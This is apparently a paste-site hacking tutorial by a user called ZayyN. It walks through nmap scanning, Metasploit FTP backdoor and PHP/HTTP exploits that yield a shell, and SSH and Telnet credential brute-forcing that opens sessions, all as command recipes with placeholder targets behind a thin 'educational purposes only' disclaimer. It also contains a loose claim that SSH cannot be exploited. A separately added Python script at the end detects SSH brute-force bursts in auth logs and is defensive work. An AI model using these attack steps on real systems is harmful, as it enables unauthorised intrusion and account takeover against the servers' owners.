Open Ports Guide **By ZayyN**

Dec 1st, 2021
 ______________________________________________
|                                              |
|  * Guide written by ZayyN_                   |
|  * Discord: ZayyN_#2829                      |
|______________________________________________|
|                                              |
|  Requirements: • Linux - OS (Kali, Parrot)   |
|                • nmap                        |
|                • msfconsole                  |
|                • A little bit of brain cells |
|______________________________________________|

============================
About open port exploiting
============================

- The methods that ethical hackers commonly use are very similar and simple...
- This guide is for educational purposes only !!!
- Do not use these methods without permission !!!
- I am not responsible for any of your actions caused by this manual !!!

Common ports ...
80, 88, 443, 21, 22, 23

############################################################################################################
#
#  • FTP    - [21 Default]     - Possible to exploit
#  • SSH    - [22 Default]     - !! Impossible to exploit !! - Strong security / Brute force is commonly used
#  • TELNET - [23 Default]     - Old - Easy to exploit - Brute force is commonly used
#  • HTTP   - [80, 88 Default] - Possible to exploit
#  • HTTPS  - [443 Default]    - Possible to exploit
#
############################################################################################################

==========================
NMAP
==========================
Aggressive scan [Universal scan]
• nmap -A <target>

Scan open ports and detect service versions ...
• nmap -sV <target>

Scan all ports, including uncommon ones ...
• nmap -sV -p- <target>

==========================
ftp metasploit exploit (only old versions)
==========================
1.) Ping the FTP server to get its IP ...
• ping <url-ip>

2.) Scan open ports with nmap ...
• nmap -sV <target>

3.) Search for an exploit for the current FTP version ... (in terminal)
• searchsploit <ftp-version>

4.) Open msfconsole as root and search for an exploit for that FTP version
• search <ftp-exploit>

5.) Then copy the backdoor exploit name and type the following commands
• use exploit/unix/ftp/<exploit-version>
• set RHOST <ftp-ip>
• set RPORT <ftp-port>
• set payload cmd/unix/interact
• exploit

6.) If you did all the steps correctly, the FTP server is exploited ... now the shell will pop up

===========================
http metasploit exploit (only old versions)
===========================
1.) Ping the server to get its IP ...
• ping <url-ip>

2.) Scan open ports with nmap to get the HTTP port... (Default is 80)
• nmap -sV <target>

3.) Open msfconsole as root and search for the HTTP version scanner module
• search auxiliary/scanner/http/http_version

4.) Use the module ....
• use auxiliary/scanner/http/http_version
• set RHOST <http-ip>
• set RPORT <http-port>
• run

5.) Now you can clearly see the HTTP version... So we can exploit it more :P Search for valid PHP exploits and run them in msfconsole
• searchsploit <http-version> | grep php -(in terminal)
• grep cgi search <php-version> -(in msfconsole)
• use 1
• show options
• set RHOST <http-ip>
• set RPORT <http-port>
• run

6.) If the steps were done correctly... you have full access
• Try sysinfo to identify the OS of the PHP server

===========================
ssh metasploit bruteforce (all versions)
===========================
1.) Ping the server to get its IP ...
• ping <url-ip>

2.) Scan open ports with nmap to get the SSH port...
• nmap -sV <target>

3.) Open msfconsole as root and search for the SSH login scanner module
• search auxiliary/scanner/ssh/ssh_login

4.) Use the module ....
• use auxiliary/scanner/ssh/ssh_login
• set RHOST <ssh-ip>
• set RPORT <ssh-port>
• set VERBOSE true
• set USER_FILE <path>
• set PASS_FILE <path>
• set STOP_ON_SUCCESS true
• run

5.) When a correct credential has been found, you can open the session ...
• sessions -i 1

==============================
telnet metasploit bruteforce (all versions)
==============================
1.) Ping the server to get its IP ...
• ping <url-ip>

2.) Scan open ports with nmap to get the port...
• nmap -sV <target>

3.) Open msfconsole as root and use the telnet login scanner module
• use auxiliary/scanner/telnet/telnet_login
• set RHOST <target-ip>
• set RPORT <telnet-port>
• set VERBOSE true
• set USER_FILE <path>
• set PASS_FILE <path>
• set STOP_ON_SUCCESS true
• run

4.) When a correct credential has been found, you can open the session ...
• sessions -i 1

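The SSH and telnet sections above both run a user list and a password list against a login service and stop at the first hit, which shows up in the server's auth log as a burst of failures from one source, optionally followed by a success. The following is an added example, not part of the original paste: it flags that pattern in OpenSSH auth-log lines only. The log excerpt, addresses and threshold of 5 are constructed assumptions, and no time window is applied.

```python
import re
from collections import defaultdict

# OpenSSH password-authentication log lines (failure or success).
LINE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) "
    r"from (\S+) port \d+"
)
THRESHOLD = 5  # assumed cut-off: failures from one source before it is flagged

# Constructed auth.log excerpt: a wordlist run, then an ordinary mistyped login.
SAMPLE = """\
Dec  1 10:00:01 bastion sshd[4001]: Failed password for root from 203.0.113.5 port 51001 ssh2
Dec  1 10:00:02 bastion sshd[4002]: Failed password for invalid user admin from 203.0.113.5 port 51002 ssh2
Dec  1 10:00:03 bastion sshd[4003]: Failed password for invalid user test from 203.0.113.5 port 51003 ssh2
Dec  1 10:00:04 bastion sshd[4004]: Failed password for invalid user oracle from 203.0.113.5 port 51004 ssh2
Dec  1 10:00:05 bastion sshd[4005]: Failed password for deploy from 203.0.113.5 port 51005 ssh2
Dec  1 10:00:06 bastion sshd[4006]: Accepted password for deploy from 203.0.113.5 port 51006 ssh2
Dec  1 10:05:00 bastion sshd[4010]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Dec  1 10:05:09 bastion sshd[4011]: Accepted password for alice from 198.51.100.7 port 40001 ssh2
"""

def detect(log_text, threshold=THRESHOLD):
    """Return {source_ip: details} for sources that reach the failure threshold."""
    failed = defaultdict(list)  # source -> usernames that failed, in order
    report = {}
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        outcome, user, src = m.groups()
        if outcome == "Failed":
            failed[src].append(user)
        elif len(failed[src]) >= threshold:
            # Success right after a burst: treat the account as compromised.
            report[src] = {"failures": len(failed[src]),
                           "users_tried": sorted(set(failed[src])),
                           "login_after_burst": user}
    for src, users in failed.items():
        if len(users) >= threshold and src not in report:
            report[src] = {"failures": len(users),
                           "users_tried": sorted(set(users)),
                           "login_after_burst": None}
    return report

if __name__ == "__main__":
    for src, info in detect(SAMPLE).items():
        print(src, info)
```

A non-empty `login_after_burst` is the case to escalate: rotate that account's password and review the session, and move the service to key-only authentication with login rate limiting.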